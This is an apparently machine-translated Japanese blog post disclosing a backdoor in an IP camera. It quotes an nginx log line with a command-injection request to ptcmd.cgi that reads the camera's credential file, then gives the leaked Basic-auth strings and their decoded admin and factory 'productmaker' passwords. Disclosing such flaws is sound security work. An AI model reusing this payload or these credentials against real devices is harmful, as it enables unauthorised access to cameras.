
今日、奇妙なカメラの挙動を発見しました。 私はnginxがそれを放送しているログを見て、また驚いた。
phpmyadminカメラに侵入する試みの山には、次のように表示されます。
171.25.193.235-productmaker [26 / Mar / 2015:02:22:19 +0300] "GET /cgi/maker/ptcmd.cgi?cmd=%3E/dev/null;cat%20usr.ini HTTP / 1.1" 200 146 "-" "カール/ 7.41.0"
このユーザーはカメラで作成されていません。
このURLを許可なしに開こうとしています-401を取得します。
承認後、次が表示されます。
管理者=基本YWRtaW46bXlfc3VwZXJwYXNz
maker =基本cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl
Base64を使用した簡単な操作の後、次の結果が得られます。
admin =基本管理者:my_superpass
maker =基本製品メーカー:ftvsbannedcode
カメラ自体(管理部分を意味する)への製品メーカーのログインでの認証は失敗しましたが、上記のURLを開くことができます。 これから、これは会社から意図的に残された「ブックマーク」であると結論付けることができます。 彼らに感謝します。
誰もがこの記事から結論を導き出しますが、私の目には、メーカーはついに顔を失いました。
ご清聴ありがとうございました。
関連記事: インフォテクトは警告します